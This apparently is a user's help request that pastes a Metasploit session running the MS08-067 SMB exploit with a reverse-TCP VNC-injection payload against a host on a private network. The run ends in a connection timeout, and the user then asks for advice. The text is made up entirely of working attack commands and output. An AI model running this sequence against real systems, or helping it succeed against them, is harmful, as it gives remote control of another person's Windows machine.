msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.103
PAYLOAD => windows/vncinject/reverse_tcp
LHOST => 192.168.1.103
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.103:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.1.102:445).


can you give me advice for that